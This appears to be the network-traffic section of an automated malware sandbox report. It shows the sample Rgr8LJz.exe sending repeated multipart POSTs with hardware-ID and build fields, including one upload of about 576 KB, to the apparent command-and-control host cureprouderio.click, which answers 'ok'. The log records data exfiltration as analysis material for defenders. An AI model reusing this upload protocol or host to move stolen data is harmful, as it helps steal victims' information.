2ce1KhLBPNXjxT5HVeL4r8JGgTQKVI8BmQ4lD/M1kwJw53InO8Qd2auNI97sN/3Ol0eEhI9wgjXYUwF2njniOw2/bxJzsQS1FoEeJumSlZuOesCoe1TSHZhKcNqiAcJfVOdXK2qNZJzKgC9jFcrUs+JOjSE2JJc5pQ8dR6t84wNY5w8qb4BNneuMZysIU21CkwPUYDZkUi2QEkV/ygjbY/TnTyuOtQW08uE/8hiTrebXXvTEa3T+HYEH/GqaK
2025-01-08 12:57:57 UTC	1369	IN	Data Raw: 75 4a 6a 4e 2f 31 41 6a 4a 43 33 69 6a 48 67 69 76 7a 62 72 54 4a 7a 69 45 49 32 44 53 4f 64 78 58 41 55 66 7a 4e 65 63 43 63 51 4e 76 43 6e 4e 78 50 4e 57 53 67 56 34 6d 77 4b 65 74 77 70 4e 44 68 55 6a 72 56 50 59 46 6d 45 38 59 65 38 73 4d 32 68 6f 51 68 79 63 53 63 35 78 41 31 4a 4c 42 64 6b 74 42 35 73 69 37 78 32 62 34 47 58 63 31 36 32 43 4a 4e 6b 51 50 79 31 54 62 48 78 32 75 4a 6a 4e 2f 31 41 6a 4a 43 33 69 6a 48 67 69 76 7a 62 72 54 4a 76 7a 45 72 2b 67 53 2b 5a 51 44 66 48 37 57 62 5a 38 43 4b 4f 5a 54 4b 68 4e 70 42 50 54 7a 66 51 59 6d 64 61 72 30 2b 6c 73 58 2b 45 52 72 4e 4b 38 31 58 44 64 59 51 70 4a 31 68 6a 34 74 58 72 61 75 63 72 55 46 7a 50 4c 68 64 68 38 55 75 39 44 37 37 6c 71 4a 45 53 49 68 74 30 43 49 63 6e 77 6a 79 6d 7a 62 59 6c Data Ascii: uJjN/1AjJC3ijHgivzbrTJziEI2DSOdxXAUfzNecCcQNvCnNxPNWSgV4mwKetwpNDhUjrVPYFmE8Ye8sM2hoQhycSc5xA1JLBdktB5si7x2b4GXc162CJNkQPy1TbHx2uJjN/1AjJC3ijHgivzbrTJvzEr+gS+ZQDfH7WbZ8CKOZTKhNpBPTzfQYmdar0+lsX+ERrNK81XDdYQpJ1hj4tXraucrUFzPLhdh8Uu9D77lqJESIht0CIcnwjymzbYl

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49734	104.21.4.114	443	7352	C:\Users\user\Desktop\Rgr8LJz.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-08 12:57:58 UTC	275	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=3HEH0N7F User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 18110 Host: cureprouderio.click
2025-01-08 12:57:58 UTC	15331	OUT	Data Raw: 2d 2d 33 48 45 48 30 4e 37 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 39 33 34 46 46 34 38 42 46 42 42 33 39 34 41 32 39 36 36 35 33 45 30 44 30 44 41 44 41 39 39 0d 0a 2d 2d 33 48 45 48 30 4e 37 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 33 48 45 48 30 4e 37 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 50 6e 68 71 6f 2d 2d 6e 62 67 6e 78 64 6c 78 64 6e 79 6f 0d 0a 2d 2d 33 48 45 48 30 4e 37 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 Data Ascii: --3HEH0N7FContent-Disposition: form-data; name="hwid"A934FF48BFBB394A296653E0D0DADA99--3HEH0N7FContent-Disposition: form-data; name="pid"2--3HEH0N7FContent-Disposition: form-data; name="lid"LPnhqo--nbgnxdlxdnyo--3HEH0N7FContent-D
2025-01-08 12:57:58 UTC	2779	OUT	Data Raw: a7 07 cf 5c b7 ad 66 f0 cc 99 a8 33 f7 13 05 cf ec 85 7a 3b 85 8d 54 32 2f 1f e5 1b c1 33 7b 37 a5 bf 9f 8e 3a f1 6e 9a e0 79 69 60 c1 4c a6 f2 f7 de 4b 1f 36 af 1d f9 d7 e0 58 6d 5b 0b fd 9c 0a b5 9b 60 cc b0 d7 ab 1f 3b d0 52 0a 9f fd 54 22 95 3f 7a 94 ff 75 ab 9f a1 e3 6f 93 83 99 38 43 4e 2f 95 2f 6d 6e ac ae d3 03 1e ad ac 6f 7a a3 8a 81 36 d9 bf 1f 83 71 fd 1a ed c5 4d d3 3e 9b d8 ac 97 0c bd 15 36 2b 97 37 bb ef 2e 57 0f bc 3e 57 2a 0f 97 2f ad 6d 4a a7 02 2f 2b 7f 42 10 78 3e ba 45 a8 b5 6d 75 bf 83 75 53 b3 09 3b 9c 3e 27 56 d3 d4 ab d6 33 5e 4f 4d 1f 4e cd b2 89 b4 bc b1 b1 56 29 af ef 1e fa 70 79 ed 62 65 cf 7b d9 de 73 45 81 36 af a9 da 16 51 bc 21 8f 77 45 11 8f 43 d4 61 11 d5 14 88 8d cc 54 77 94 6d 93 be 93 15 d7 52 9c ab a6 b6 5f c9 35 8b Data Ascii: \f3z;T2/3{7:nyi`LK6Xm[`;RT"?zuo8CN//mnoz6qM>6+7.W>W*/mJ/+Bx>EmuuS;>'V3^OMNV)pybe{sE6Q!wECaTwmR_5
2025-01-08 12:57:59 UTC	1128	IN	HTTP/1.1 200 OK Date: Wed, 08 Jan 2025 12:57:59 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=sfg5cvuo2ofpucelfnr85j76b4; expires=Sun, 04 May 2025 06:44:38 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=j7CuhfOOzF%2FZVwCzgmwRutA9rDUDyyQnqey8qowxdA6wvuW0HfXaMjswVb6nbB%2FvwfQ2JxapYQPdrhva%2BWmIyZ5a22hJR6C3zMs4UJ3lYwzDboYPGPomaUsJ7vFdtcbTOcqryueS"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fec5b3e8e3a78e2-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1910&min_rtt=1900&rtt_var=734&sent=9&recv=21&lost=0&retrans=0&sent_bytes=2850&recv_bytes=19065&delivery_rate=1469552&cwnd=249&unsent_bytes=0&cid=59542012e25ac5bc&ts=671&x=0"
2025-01-08 12:57:59 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2025-01-08 12:57:59 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49738	104.21.4.114	443	7352	C:\Users\user\Desktop\Rgr8LJz.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-08 12:57:59 UTC	280	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=HDUT1ZRA56XN2J User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8767 Host: cureprouderio.click
2025-01-08 12:57:59 UTC	8767	OUT	Data Raw: 2d 2d 48 44 55 54 31 5a 52 41 35 36 58 4e 32 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 39 33 34 46 46 34 38 42 46 42 42 33 39 34 41 32 39 36 36 35 33 45 30 44 30 44 41 44 41 39 39 0d 0a 2d 2d 48 44 55 54 31 5a 52 41 35 36 58 4e 32 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 48 44 55 54 31 5a 52 41 35 36 58 4e 32 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 50 6e 68 71 6f 2d 2d 6e 62 67 6e 78 64 6c 78 64 6e 79 6f 0d 0a 2d 2d 48 Data Ascii: --HDUT1ZRA56XN2JContent-Disposition: form-data; name="hwid"A934FF48BFBB394A296653E0D0DADA99--HDUT1ZRA56XN2JContent-Disposition: form-data; name="pid"2--HDUT1ZRA56XN2JContent-Disposition: form-data; name="lid"LPnhqo--nbgnxdlxdnyo--H
2025-01-08 12:58:00 UTC	1123	IN	HTTP/1.1 200 OK Date: Wed, 08 Jan 2025 12:58:00 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=h6d2eevosmlrd4muflhrm2jjbd; expires=Sun, 04 May 2025 06:44:39 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=idiMgDd1J0PJzO2V1FWOT77Jx51Ii44bqBV0LxHFJEnMljs12VZW9WWIETaqReU2YVILR7nLSZVGyjeFJotDzBJh0Nlg13rdIPWaZYGYxoTANCn%2B9u6xvK0f4yKfprZgLcvPJPtl"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fec5b45cd764288-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1601&min_rtt=1597&rtt_var=607&sent=7&recv=14&lost=0&retrans=0&sent_bytes=2851&recv_bytes=9705&delivery_rate=1789215&cwnd=246&unsent_bytes=0&cid=a2dfcb70e7d5b996&ts=491&x=0"
2025-01-08 12:58:00 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2025-01-08 12:58:00 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49739	104.21.4.114	443	7352	C:\Users\user\Desktop\Rgr8LJz.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-08 12:58:01 UTC	283	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=W8WFOFWRUZT4PEWW User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 20432 Host: cureprouderio.click
2025-01-08 12:58:01 UTC	15331	OUT	Data Raw: 2d 2d 57 38 57 46 4f 46 57 52 55 5a 54 34 50 45 57 57 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 39 33 34 46 46 34 38 42 46 42 42 33 39 34 41 32 39 36 36 35 33 45 30 44 30 44 41 44 41 39 39 0d 0a 2d 2d 57 38 57 46 4f 46 57 52 55 5a 54 34 50 45 57 57 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 57 38 57 46 4f 46 57 52 55 5a 54 34 50 45 57 57 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 50 6e 68 71 6f 2d 2d 6e 62 67 6e 78 64 6c 78 64 6e 79 Data Ascii: --W8WFOFWRUZT4PEWWContent-Disposition: form-data; name="hwid"A934FF48BFBB394A296653E0D0DADA99--W8WFOFWRUZT4PEWWContent-Disposition: form-data; name="pid"3--W8WFOFWRUZT4PEWWContent-Disposition: form-data; name="lid"LPnhqo--nbgnxdlxdny
2025-01-08 12:58:01 UTC	5101	OUT	Data Raw: 00 00 00 00 60 93 1b 88 82 85 4d 3f 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c 72 83 51 b0 b0 e9 a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 4d 6e 20 0a 16 36 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 c9 0d 46 c1 c2 a6 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 b9 81 28 58 d8 f4 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 26 37 18 05 0b 9b 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e4 06 a2 60 61 d3 4f 03 00 00 00 00 Data Ascii: `M?lrQMn 64F6(X&7~`aO
2025-01-08 12:58:01 UTC	1127	IN	HTTP/1.1 200 OK Date: Wed, 08 Jan 2025 12:58:01 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=d1ovs5po6buk0jr2i9p4085mmo; expires=Sun, 04 May 2025 06:44:40 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JlUzrcFTT4yjeIXigRR%2F3r5TzLqKahJKbMye8PSeKfKgOGbAA1Kf37nPrPlGFN0i44bw3SajZZ21bFdR7GfK49MsTidf57z9mVxTTrE6mvnO%2FDOgkeK5PRdEJLorBKE5SnxJtnTH"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fec5b4d0f8d440c-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1599&min_rtt=1595&rtt_var=607&sent=18&recv=27&lost=0&retrans=0&sent_bytes=2851&recv_bytes=21395&delivery_rate=1788120&cwnd=252&unsent_bytes=0&cid=5b12af7283b13e08&ts=723&x=0"
2025-01-08 12:58:01 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2025-01-08 12:58:01 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49741	104.21.4.114	443	7352	C:\Users\user\Desktop\Rgr8LJz.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-08 12:58:02 UTC	280	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=KK3S8JR0LSXHUL2 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 969 Host: cureprouderio.click
2025-01-08 12:58:02 UTC	969	OUT	Data Raw: 2d 2d 4b 4b 33 53 38 4a 52 30 4c 53 58 48 55 4c 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 39 33 34 46 46 34 38 42 46 42 42 33 39 34 41 32 39 36 36 35 33 45 30 44 30 44 41 44 41 39 39 0d 0a 2d 2d 4b 4b 33 53 38 4a 52 30 4c 53 58 48 55 4c 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 4b 4b 33 53 38 4a 52 30 4c 53 58 48 55 4c 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 50 6e 68 71 6f 2d 2d 6e 62 67 6e 78 64 6c 78 64 6e 79 6f 0d 0a Data Ascii: --KK3S8JR0LSXHUL2Content-Disposition: form-data; name="hwid"A934FF48BFBB394A296653E0D0DADA99--KK3S8JR0LSXHUL2Content-Disposition: form-data; name="pid"1--KK3S8JR0LSXHUL2Content-Disposition: form-data; name="lid"LPnhqo--nbgnxdlxdnyo
2025-01-08 12:58:02 UTC	1130	IN	HTTP/1.1 200 OK Date: Wed, 08 Jan 2025 12:58:02 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=nbpicv6s9087u5srjtin6eksvp; expires=Sun, 04 May 2025 06:44:41 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FSWWt%2BUi4GouACkXXZKnjqUbLY4pTXs1iJM9S%2Fcs7CJDwUkjrAtVjq1BwebVRysm2FMecJhGvC1RlCiHR%2BrE4W98d9xhyqs5WOvYJDusjVwVtlJeKcCqlj89aKDGzWeKDliCCWth"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fec5b565b3e43ed-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=31940&min_rtt=31074&rtt_var=13385&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=1885&delivery_rate=76834&cwnd=210&unsent_bytes=0&cid=999d3e66fcd129c9&ts=661&x=0"
2025-01-08 12:58:02 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2025-01-08 12:58:02 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49742	104.21.4.114	443	7352	C:\Users\user\Desktop\Rgr8LJz.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-08 12:58:03 UTC	287	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=UTQDRZAZTR8LV2KLNM7 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 575948 Host: cureprouderio.click
2025-01-08 12:58:03 UTC	15331	OUT	Data Raw: 2d 2d 55 54 51 44 52 5a 41 5a 54 52 38 4c 56 32 4b 4c 4e 4d 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 39 33 34 46 46 34 38 42 46 42 42 33 39 34 41 32 39 36 36 35 33 45 30 44 30 44 41 44 41 39 39 0d 0a 2d 2d 55 54 51 44 52 5a 41 5a 54 52 38 4c 56 32 4b 4c 4e 4d 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 55 54 51 44 52 5a 41 5a 54 52 38 4c 56 32 4b 4c 4e 4d 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 50 6e 68 71 6f 2d 2d 6e 62 Data Ascii: --UTQDRZAZTR8LV2KLNM7Content-Disposition: form-data; name="hwid"A934FF48BFBB394A296653E0D0DADA99--UTQDRZAZTR8LV2KLNM7Content-Disposition: form-data; name="pid"1--UTQDRZAZTR8LV2KLNM7Content-Disposition: form-data; name="lid"LPnhqo--nb
2025-01-08 12:58:03 UTC	15331	OUT	Data Raw: 5b f7 55 1c db 2a ed d2 02 fe 53 f9 b5 f0 26 68 e9 a7 75 ff f0 8f 67 b2 ba 5b f7 3a 49 a2 03 03 68 86 ec 75 88 dc 47 6f 73 7a 9c 52 7b 33 11 07 37 ff 40 da 76 e8 21 6f a8 66 b3 77 be dc 1f 02 74 02 48 6e 82 35 40 40 c5 e6 c8 1d 0d dc 61 e0 6e 5a ed 01 5d 09 c3 45 ee 9d 37 83 40 6b b2 7a 43 c8 04 94 51 b1 05 a6 65 8e d1 ed fc 78 58 90 5c 5f 2b 04 1c 03 9c ff b7 10 f2 16 16 04 09 a2 4a 25 c0 8c 0a 9e 93 83 a6 3a fe 2f 58 6f ea dc bb a3 ef 00 47 19 75 27 c4 01 f5 4f 22 aa fb cd 45 20 85 a3 4f 3f 45 c3 a2 27 9f 3e b4 fe 16 e2 b7 fc fa e6 b4 df 71 6a bd 10 a3 cd 1a 22 1f 47 78 57 2c 39 a3 15 31 bb 12 91 34 85 c9 5c 51 20 93 6d c3 8a ce 24 74 8a e6 bc 65 7c a5 d6 f6 70 28 a9 2c b3 c2 ab e3 02 48 7d 19 33 96 ca 5e 1a bd 6c 78 34 ca 20 8d 30 f6 3f 0a e9 39 44 4c Data Ascii: [U*S&hug[:IhuGoszR{37@v!ofwtHn5@@anZ]E7@kzCQexX\_+J%:/XoGu'O"E O?E'>qj"GxW,914\Q m$te\|p(,H}3^lx4 0?9DL
2025-01-08 12:58:03 UTC	15331	OUT	Data Raw: 6b 07 fe 1c 10 95 cd 22 fe b9 e1 d3 5b 88 b1 0d d8 93 20 c6 2b 23 a4 74 90 d0 61 53 16 e5 d9 26 ca 44 82 62 cf 07 a2 cc de 29 37 3b 3e 58 06 9a 7b 8d 30 b1 c0 6e 27 5f 53 5a c4 2b 5a fc 96 c2 ec bc 09 06 7e 70 e5 87 f7 96 28 28 51 43 5b 21 49 0e 5d ff d7 84 aa 05 f5 d2 9c 7e ea 96 59 bb 99 7f 46 d3 ed 77 77 f0 6a cc 34 2d c1 ed 1b 46 65 4d ef 22 2f 30 f1 98 c8 d8 c4 45 47 95 f5 f6 9f 74 9d bd 01 ec 7b ee 4e cf 7f b1 55 ed c3 5e 36 3c c6 4e b6 50 5a a1 73 64 1b 55 94 fd 8b 0b 80 dc 5a ae 80 86 e3 38 a8 39 e1 65 8a b5 30 53 43 84 1a 0f 29 1d 3a 31 8e b8 81 91 3e 8d 61 fc e0 2d e0 be bf 44 f4 1e 1d 4a d1 d8 2c 6b 9d 28 50 41 22 8b 9e 56 c1 b8 af d8 4e 56 b7 d8 9d 99 4d ab 31 4e 83 4e 0a 9c bc 89 1b 92 13 31 d2 c2 e6 ca aa 75 a1 e4 76 54 7b 69 22 f6 38 04 a4 Data Ascii: k"[ +#taS&Db)7;>X{0n'_SZ+Z~p((QC[!I]~YFwwj4-FeM"/0EGt{NU^6<NPZsdUZ89e0SC):1>a-DJ,k(PA"VNVM1NN1uvT{i"8
2025-01-08 12:58:03 UTC	15331	OUT	Data Raw: c8 d3 4e b9 41 b7 83 7b 4f f7 c0 1a 8f 55 b4 bc f7 de 58 50 60 75 c8 ba 29 e3 5f cf b7 35 84 95 ac 27 5b 5e b4 7a b8 17 a1 b9 04 79 27 94 15 78 72 cf 36 e2 86 94 5e d5 20 ee f2 da a0 66 82 29 e3 a9 0a 03 c0 f9 ce c0 72 ca b7 41 70 0a aa 0c c5 30 2f 44 76 15 4a bd cc dd c9 5b e2 7b 87 c5 77 f9 4d 28 7d 09 62 17 f2 93 7e b0 d8 5b 84 9d f3 ea fc 60 fd 3c f9 c1 a1 f0 09 29 9e 2c f3 3a 60 ec c9 6c 6f 3a e5 7d f9 56 71 f4 f3 5d 82 fa 0b 2f 56 01 b1 32 28 5a f1 51 d9 55 7f 38 b0 4a 41 63 37 b8 71 ff 85 26 ea c0 2a 07 77 2b 81 17 0f d1 14 76 55 f0 6a 6e fe 81 ce 41 c2 84 89 ad fe 42 17 87 e5 5f 98 5a ba 3f 3d 7a d7 fe 3a 36 79 f6 c1 1c 63 90 1e 6d 1e c4 d5 7b d6 2f 2d 7e c4 f8 8d c9 d0 91 64 c2 cf 8f c0 86 8c f3 0a 1e 55 61 fc 39 35 75 c2 94 f4 05 10 89 95 19 02 Data Ascii: NA{OUXP`u)_5'[^zy'xr6^ f)rAp0/DvJ[{wM(}b~[`<),:`lo:}Vq]/V2(ZQU8JAc7q&*w+vUjnAB_Z?=z:6ycm{/-~dUa95u
2025-01-08 12:58:03 UTC	15331	OUT	Data Raw: 0f c8 4b 2a c8 59 b0 ed 0d e7 43 cb ee dd a1 71 06 9d b1 6f 33 63 ca da 15 31 79 8c 61 b3 7a 52 c3 90 a7 e0 db 85 45 49 31 c0 7a b8 ba 14 71 e8 22 05 12 95 65 9d 05 4d 3e 7a 1c 7c 2b 84 60 9f de 65 45 6b 7c 46 4e 32 80 c9 ae 7c 36 28 98 e0 1c 75 66 2e 62 87 b6 37 bd 52 4d da 6f 72 7f 3e d1 87 73 c6 17 d3 c3 63 91 83 93 6a 26 15 4a 3e 43 9f fb 02 0b 1b 06 ec 02 31 ca 4a 83 99 48 15 5f 58 c3 85 88 92 f8 b2 a7 9f 56 30 eb 1d bf 5d 53 43 5c 44 9d fc 50 3d 65 5e 01 b6 52 0b 25 c2 46 30 43 24 45 e7 aa bb c0 21 cc 56 31 22 52 d8 cc 53 66 ff 75 be ce cd 33 d3 45 2b 4b ef a7 da 2d ee 69 b7 e6 6a b1 31 5c 8f e2 64 46 d2 4c 0d b6 3f bc cc 55 3e 8a 27 7a cd 81 dd 33 fa ab 33 e2 38 f0 94 4c 3f 07 fd b1 31 55 39 6a 76 bf 5e 4c ac 55 b8 be 8f 98 c3 1d f5 af ec d6 c8 3b Data Ascii: K*YCqo3c1yazREI1zq"eM>z\|+`eEk\|FN2\|6(uf.b7RMor>scj&J>C1JH_XV0]SC\DP=e^R%F0C$E!V1"RSfu3E+K-ij1\dFL?U>'z338L?1U9jv^LU;
2025-01-08 12:58:03 UTC	15331	OUT	Data Raw: c2 f1 18 b3 86 2b 05 03 4f 9f 5c 0d a8 2a ab fe 59 56 fd fb 7d f8 85 91 e2 2b 83 53 55 83 db a6 e7 fc b5 cc 3e 30 7d 43 23 63 fb 6b 96 de fd a3 8d f7 ed ad fc 6a ba f4 7d 7a ae cb ab ac 5c 5d 29 f4 4b c6 f2 97 af 23 04 b0 cf 27 ee ac ef a1 b3 ec c4 6c 4d 6c 29 28 66 79 aa b6 85 4d be 7c 38 70 5d 58 7e 60 24 85 34 97 7f 94 88 a0 d0 42 91 55 6b 79 90 3c 86 2c 8e 15 ad c1 cc 76 c6 77 f4 95 ef ff 6e b9 6e 25 f1 e1 99 fd bf 4e 3d a9 6a 7f 6b 64 c3 20 2a c4 a0 d0 0d 7e 5d ab 46 42 88 3f e0 7e 4a 14 88 68 81 19 09 ac 48 f3 00 83 1f 07 b6 59 0d bb e1 80 36 cc 70 c7 c2 a7 b7 86 3e ab 63 f9 9b e5 81 86 af ec 71 e2 60 80 df 66 a9 3a 13 77 ab 82 77 6e 7a f6 66 56 c1 d1 80 4d ab c0 23 5e 3f 35 ea 10 03 69 b6 0c 9b 72 0c c8 24 d0 6e 83 05 2f 7e b2 53 